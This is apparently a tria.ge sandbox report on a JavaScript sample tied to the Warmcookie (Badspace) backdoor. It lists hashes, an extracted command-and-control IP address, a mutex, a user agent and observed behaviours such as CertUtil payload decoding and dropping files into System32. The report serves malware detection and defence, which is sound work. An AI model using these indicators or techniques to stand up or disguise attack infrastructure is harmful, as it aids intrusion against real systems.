Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    decoded-2.js

  • Size

    114KB

  • Sample

    250125-1jmj3ssper

  • MD5

    202ade5e6433d48697049f1962f1c87a

  • SHA1

    cfead5849611f5e42092453afb7d3aa22174b223

  • SHA256

    74a7adba42d14c4325d64bb93857d44e269a096815df71f24e5a38bd5351842d

  • SHA512

    fa7ec940c62ede3bc1627a2f03922090ad114967efd15a7feea998b5abfa0ae9b48630d2376caaabe632a8aa1c7996d81dbcee0b9f9d30c6270f117650648685

  • SSDEEP

    1536:UKucuwu/P9vckrgF4zjnAsR6KZs7/wpY0tOCMBh0ljjqcFs:UKFuf/P9UkG4zjCKo/eKBhYs

Malware Config

Extracted

Family

warmcookie

C2

149.248.58.85

Attributes
  • mutex

    3e4d7a5b-aa72-4d5f-8f8c-b292257af55c

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Targets

    • Target

      decoded-2.js

    • Size

      114KB

    • MD5

      202ade5e6433d48697049f1962f1c87a

    • SHA1

      cfead5849611f5e42092453afb7d3aa22174b223

    • SHA256

      74a7adba42d14c4325d64bb93857d44e269a096815df71f24e5a38bd5351842d

    • SHA512

      fa7ec940c62ede3bc1627a2f03922090ad114967efd15a7feea998b5abfa0ae9b48630d2376caaabe632a8aa1c7996d81dbcee0b9f9d30c6270f117650648685

    • SSDEEP

      1536:UKucuwu/P9vckrgF4zjnAsR6KZs7/wpY0tOCMBh0ljjqcFs:UKFuf/P9UkG4zjCKo/eKBhYs

    • Warmcookie family

    • Warmcookie, Badspace

      Warmcookie aka Badspace is a backdoor written in C++.

    • Blocklisted process makes network request

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Deobfuscate/Decode Files or Information

      Payload decoded via CertUtil.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks